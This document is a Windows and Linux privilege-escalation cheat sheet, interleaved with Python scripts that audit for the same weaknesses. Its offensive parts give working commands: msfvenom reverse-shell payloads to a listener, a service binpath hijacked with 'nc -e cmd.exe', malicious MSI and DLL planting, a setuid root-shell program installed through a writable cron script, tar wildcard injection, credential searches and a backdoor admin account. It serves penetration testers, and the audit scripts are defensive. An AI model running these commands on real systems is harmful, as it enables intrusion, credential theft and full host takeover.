Windows
Kernel Exploits
systeminfo -> look up missing KBs
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Sherlock -> Find-AllVulns (PowerShell)
0xsp Mongoose
Common Kernel Exploits
- [MS16-014](https://www.exploit-db.com/exploits/40039) – applies to: Windows 7 SP1 x86
- [MS16-016](https://www.exploit-db.com/exploits/39432) – 'WebDAV', applies to: Windows 7 SP1 x86 (Build 7601)
- [MS16-032](https://www.exploit-db.com/exploits/39719) – applies to: Windows 7 x86/x64, Windows 8 x86/x64, Windows 10, Windows Server 2008-2012 R2
- CVE-2020-0796 – applies to: Windows operating systems with SMBv3 enabled
- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)
- CVE-2019-1388
Config files
Credentials in cleartext or base64, left behind once Windows is installed:
- c:\sysprep.inf
- c:\sysprep\sysprep.xml
- %WINDIR%\Panther\Unattend\Unattended.xml
- %WINDIR%\Panther\Unattended.xml
GPP (Group Policy Preferences)
Only applicable to domain-joined devices.
Groups.xml is stored in SYSVOL on the DC.
The cpassword value is encrypted with AES, but the key is public, so it can be decrypted.
\\dc2018.lab\SYSVOL\dc2008.lab\Policies\{id}\MACHINE\Preferences\Groups
Other Files
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
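An added example (not from the original post): a small Python scanner that walks a copy of SYSVOL looking for the six GPP file types listed above and reports every element that still carries a cpassword attribute, without decrypting it. The directory layout and the XML samples it writes are constructed.

```python
"""Scan a SYSVOL-style tree for Group Policy Preference files that still carry a
cpassword attribute. Only the attribute's length is reported; nothing is decrypted."""
import os
import tempfile
import xml.etree.ElementTree as ET

GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "Printers.xml", "Drives.xml", "DataSources.xml"}
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")  # the account attribute differs per file type

def cpassword_entries(xml_path):
    """(tag, account, len(cpassword)) for every element carrying a cpassword attribute."""
    found = []
    for _, elem in ET.iterparse(xml_path):
        if "cpassword" in elem.attrib:
            account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
            found.append((elem.tag, account, len(elem.attrib["cpassword"])))
    return found

def scan_sysvol(root):
    """Walk ROOT (a copy of \\\\dc\\SYSVOL) and map each offending file (relative path) to its entries."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                entries = cpassword_entries(path)
                if entries:
                    report[os.path.relpath(path, root)] = entries
    return report

# Constructed samples; the cpassword values are placeholders, not real ciphertext.
SAMPLES = {
    "Groups": '<Groups><User name="LocalAdmin"><Properties action="U" userName="LocalAdmin"'
              ' cpassword="PLACEHOLDER_CPASSWORD_BLOB"/></User></Groups>',
    "Services": '<NTServices><NTService name="Backup"><Properties startupType="AUTOMATIC"'
                ' accountName="LAB\\svc_backup" cpassword="PLACEHOLDER_CPASSWORD_BLOB"/></NTService></NTServices>',
    "Drives": '<Drives><Drive name="H:"><Properties action="U" path="\\\\fs\\home" letter="H"/></Drive></Drives>',
}

def build_demo():
    """Write the samples as Policies/{GPO-ID}/MACHINE/Preferences/<Kind>/<Kind>.xml; return the root."""
    root = tempfile.mkdtemp()
    for kind, text in SAMPLES.items():
        folder = os.path.join(root, "Policies", "{GPO-ID}", "MACHINE", "Preferences", kind)
        os.makedirs(folder)
        with open(os.path.join(folder, kind + ".xml"), "w") as f:
            f.write(text)
    return root
```

Run `scan_sysvol(build_demo())` to see the Groups and Services files reported while the Drives file (no cpassword) is skipped.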
Other Misc Passwords
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
web.config
php.ini
httpd.conf
access.log
PowerUp:
- Get-WebConfig (IIS > web.config)
PuTTY:
- reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
TightVNC:
reg query HKCU\Software\TightVNC\Server
bncpwd.exe
Always Install Elevated:
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- if both values are 1, create a malicious .msi file (with msfvenom, for example)
- execute it with msiexec /quiet /qn /i <filename>
PowerUp:
Get-RegistryAlwaysInstallElevated
Write-UserAddMSI
Unquoted Services Paths (trusted service paths)
For each space in an unquoted file path, Windows will try to execute a program whose name matches the text in front of that space, before falling back to the full path.
Example: for the service path C:\Program Files\Some Folder\Service.exe, Windows tries, in order:
- C:\Program.exe
- C:\Program Files\Some.exe
- C:\Program Files\Some Folder\Service.exe
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
PFNet example:
* C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe
* icacls "C:\Program Files (x86)\Privacyware"
* msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe
Start and stop the service:
sc stop PFNet
sc start PFNet
PowerUp:
Get-ServiceUnquoted
Write-ServiceBinary -Name <service> -Path <path>
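An added example, not from the original post: a Python audit that takes the CSV form of the wmic query above (wmic service get name,pathname,startmode /format:csv), keeps auto-start services whose unquoted path contains spaces, and lists the intermediate executables Windows would try before the real one, reproducing the Some Folder\Service.exe walk-through. The wmic output embedded here is a constructed sample.

```python
"""List auto-start services whose unquoted image path contains spaces and show, in
order, the executables Windows would try before reaching the real binary. Input is
the CSV form of the wmic query (wmic service get name,pathname,startmode /format:csv)."""
import csv
import io
import re

# Constructed sample in wmic's CSV layout (real output also starts with a blank line).
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
HOST1,PFNet,C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe,Auto
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,GoodSvc,"C:\Program Files\Good Vendor\good.exe" -k netsvcs,Auto
HOST1,LazySvc,C:\Some Folder\lazy.exe,Manual
"""

FIRST_EXE = re.compile(r"^(.*?\.exe)\b", re.IGNORECASE)  # image path ends at the first .exe

def image_path(pathname):
    """Split a service PathName into (image path, was_quoted), dropping any arguments."""
    s = pathname.strip()
    if s.startswith('"'):
        return s[1:s.find('"', 1)], True
    m = FIRST_EXE.match(s)
    return (m.group(1) if m else s), False

def unquoted_candidates(pathname):
    """Paths CreateProcess tries in turn for an unquoted path with spaces; [] when the path is safe.
    Assumes the documented rule: cut at each space and append .exe to the partial name."""
    path, quoted = image_path(pathname)
    if quoted or " " not in path:
        return []
    parts = path.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [path]

def find_unquoted_services(wmic_csv):
    """[(service name, candidate paths)] for auto-start services with unquoted, space-containing paths."""
    rows = csv.DictReader(io.StringIO(wmic_csv.strip()), quoting=csv.QUOTE_NONE)
    findings = []
    for row in rows:
        if row["StartMode"].strip().lower() != "auto":
            continue
        candidates = unquoted_candidates(row["PathName"])
        if candidates:
            findings.append((row["Name"], candidates))
    return findings

if __name__ == "__main__":
    for name, candidates in find_unquoted_services(SAMPLE_WMIC_CSV):
        print(name, "->", " | ".join(candidates))
```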
Insecure Service Permissions
whoami, then net user <name> - enumerate group membership
accesschk.exe -> part of Sysinternals
accesschk.exe -ucqv <service>
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
Write access to a service as an authenticated user?
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
net start upnphost
PowerUp:
Get-ModifiableService
Test-ServiceDaclPermission
Invoke-ServiceAbuse -Name <service> -Command <command>
DLL Hijacking
Requires user interaction / reboot.
DLL search order on 32-bit systems:
1. The directory from which the application is loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory
6. Directories in the PATH environment variable
You can use Procmon to look for hijackable DLLs with the following filters:
- Result is NAME NOT FOUND (Include)
- Path ends with .dll
echo %path%
icacls C:\Python27
accesschk.exe -dqv "C:\Python27"
sc qc IKEEXT
Generate a malicious payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f dll > evil.dll
Windows 7 x86/x64:
- IKE and AuthIP IPsec Keying Modules (IKEEXT) – wlbsctrl.dll
PowerUp:
Find-PathDLLHijack
Find-ProcessDLLHijack
Invoke-AllChecks
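Added example (not part of the original post): Python that applies the two Procmon filters above to a CSV export (File > Save as CSV), keeps only the misses that land in a directory the current user can write to, and maps each hit to its step in the 32-bit search order listed above. The export, the writable-directory set (standing in for icacls/accesschk output) and the PATH entries are all constructed.

```python
"""Apply the two Process Monitor filters from this section (Result is NAME NOT FOUND,
Path ends with .dll) to a Procmon CSV export, keep the misses that land in a
directory the user can write to, and map each to its step in the search order."""
import csv
import io
import ntpath

# Constructed sample in Procmon's CSV export column layout.
SAMPLE_PROCMON_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","svchost.exe","612","CreateFile","C:\\Windows\\System32\\wlbsctrl.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","svchost.exe","612","CreateFile","C:\\Python27\\wlbsctrl.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","svchost.exe","612","CreateFile","C:\\Python27\\wlbsctrl.dll.config","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.4","notepad.exe","4120","CreateFile","C:\\Windows\\System32\\user32.dll","SUCCESS","Desired Access: Read Data"
'''
WRITABLE_DIRS = {r"C:\Python27", r"C:\Users\Public"}  # constructed; fill from icacls / accesschk
PATH_DIRS = [r"C:\Windows\System32", r"C:\Windows", r"C:\Python27"]  # constructed echo %path%

def norm(d):
    return d.lower().rstrip("\\")

def missing_dll_loads(procmon_csv):
    """(process, path) for each CreateFile on a .dll that ended in NAME NOT FOUND."""
    rows = csv.DictReader(io.StringIO(procmon_csv))
    return [(r["Process Name"], r["Path"]) for r in rows
            if r["Result"] == "NAME NOT FOUND" and r["Path"].lower().endswith(".dll")]

def search_order_step(directory, app_dir, cwd, path_dirs):
    """Position of DIRECTORY in the 32-bit search order listed above (1-6), or None."""
    fixed = [app_dir, r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows", cwd]
    for step, d in enumerate(fixed, start=1):
        if norm(d) == norm(directory):
            return step
    return 6 if norm(directory) in {norm(p) for p in path_dirs} else None

def hijackable_dlls(procmon_csv, writable_dirs, app_dir, cwd, path_dirs):
    """Missing DLLs whose directory is writable: (process, path, search-order step)."""
    writable = {norm(d) for d in writable_dirs}
    out = []
    for proc, path in missing_dll_loads(procmon_csv):
        d = ntpath.dirname(path)
        if norm(d) in writable:
            out.append((proc, path, search_order_step(d, app_dir, cwd, path_dirs)))
    return out

if __name__ == "__main__":
    print(hijackable_dlls(SAMPLE_PROCMON_CSV, WRITABLE_DIRS, r"C:\Windows\System32", r"C:\Windows\System32", PATH_DIRS))
```

Note that the .dll.config miss is dropped by the "ends with .dll" filter and the System32 miss by the writable-directory check, leaving only the PATH-directory hit (step 6).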
Scheduled tasks:
On Windows 2000, 2003 and XP, scheduled tasks run as SYSTEM. Are they calling any .exe's, and can you overwrite them?
accesschk.exe -dqv <folder>
Can you create a task yourself?
net start "Task Scheduler"
at <hour> /interactive "path to evil exe"
PowerUp:
Get-ModifiableScheduledTaskFile
Useful commands
* hostname
* echo %username%
* whoami /priv
* qwinsta - other logged-in users
* net users
* net user <username>
* net localgroup
* net localgroup Administrators
* net user rottenadmin P@ssword123! /add
* net localgroup Administrators rottenadmin /add
* ipconfig /all
* route print
* arp -a
* netstat -ano
* C:\WINDOWS\System32\drivers\etc\hosts
* schtasks /query /fo LIST /v - scheduled tasks
* tasklist /SVC - running processes
* net start - started services
* cd\ & dir /b /s proof.txt
Linux
- LD_PRELOAD (not covered here) – [URL](http://www.dankalia.com/tutor/01005/0100501004.htm)
Scripts & Tools
- 0xsp Mongoose
- Linux-Enum-Mod
- linux-exploit-suggester
Kernel Exploits
- Mongoose 0xsp
- uname -a -> searchsploit
- linux-exploit-suggester
Common Kernel Exploits
* CVE-2010-2959
* CVE-2020-8835
* CVE-2019-7304
* CVE-2019-9213
* CVE-2018-5333
Services Running as root
- ps aux | grep root
- any shell escape sequences?
SUID Executables
- runs with permissions of the owner
- find / -perm -u=s -type f 2>/dev/null
- any shell escape sequences? Do we have write access to the binary?
Sudo rights/users
- sudo -l
- what can we execute -> any shell escape sequences
Cron jobs
find / -perm -2 -type f 2>/dev/null -> world-writable files
ls -la /etc/cron.d
/* rootme.c */
#include <unistd.h>

int main(void)
{
    setgid(0);                              /* become group root */
    setuid(0);                              /* become root; only works once the binary is setuid root */
    execl("/bin/sh", "sh", (char *)NULL);   /* replace this process with a shell */
    return 1;                               /* only reached if execl fails */
}
gcc rootme.c -o rootme
echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.sh
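An added example that is not part of the original post, serving both the SUID section and the cron-job section: the setuid-file listing behind `find / -perm -u=s -type f`, and a check of whether the script a cron entry runs is writable by anyone but its owner, which is what lets cron-logrotate.sh be rewritten in the steps above. It builds a throwaway directory tree and a constructed crontab so it runs offline.

```python
"""Two checks behind the SUID and cron-job sections: list files carrying the setuid bit
(`find / -perm -u=s -type f`) and flag cron entries whose script is group- or world-writable."""
import os
import re
import stat
import tempfile

def suid_files(root):
    """Regular files under ROOT with the setuid bit set."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def loosely_writable(path):
    """True when group or others may write the file (`find -perm -2` covers the others bit)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def writable_cron_targets(cron_text, system_format=True):
    """(path, command) for existing, loosely writable absolute paths in cron commands.
    system_format=True means /etc/crontab or /etc/cron.d layout (user column after the time fields)."""
    findings = []
    for line in cron_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank, comment or VAR=value line
        skip = (1 if fields[0].startswith("@") else 5) + (1 if system_format else 0)
        command = " ".join(fields[skip:])
        for path in re.findall(r"/\S+", command):
            if os.path.isfile(path) and loosely_writable(path):
                findings.append((path, command))
    return findings

def build_demo():
    """Constructed tree: a setuid file, a world-writable cron script, a sane one, and a crontab."""
    root = tempfile.mkdtemp()
    sbin = os.path.join(root, "usr", "local", "sbin")
    os.makedirs(sbin)
    bad, good, suid = [os.path.join(sbin, n) for n in ("cron-logrotate.sh", "backup.sh", "rootme")]
    for path, mode in ((bad, 0o777), (good, 0o755), (suid, 0o4755)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    crontab = "PATH=/usr/bin:/bin\n*/5 * * * * root %s\n0 2 * * * root %s --rotate\n" % (bad, good)
    return root, crontab
```

`build_demo()` returns the tree root and the crontab text; pass them to `suid_files()` and `writable_cron_targets()` to see only rootme and cron-logrotate.sh reported.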
Wildcards
- often combined with user interaction/cron jobs
- cf. the paper "Back to the Future: Unix Wildcards Gone Wild"
- wildcards can be used to inject arbitrary arguments by creating files whose names are parsed as options
Example:
--checkpoint=<number> and --checkpoint-action=<command>
--checkpoint=1 and --checkpoint-action=exec=sh rshell.sh
Path Abuse ('.' in the path)
Requires user interaction (e.g. somebody needs to have . in their PATH)
* PATH=.:${PATH}
* export PATH
* echo $PATH
* replace executable files with a malicious one
Useful commands
* ps aux | grep root
* crontab -l
* ifconfig -a
* cat /etc/resolv.conf
* netstat -tulpn
* arp -e
* route
* id
* who
* cat /etc/passwd | cut -d: -f1 - list of users
* ls -la ~/.ssh
* find . -name package.json -print -exec cat {} +
Sources
- https://www.fuzzysecurity.com/tutorials/16.html
- https://toshellandback.com/2015/11/24/ms-priv-esc/
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://payatu.com/guide-linux-privilege-escalation/#
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://github.com/sagishahar/lpeworkshop
Offensive security expert and founder of 0xsp security research and development (SRD), passionate about hacking and breaking stuff, coder and maintainer of 0xsp-mongoose RED and many other open-source projects.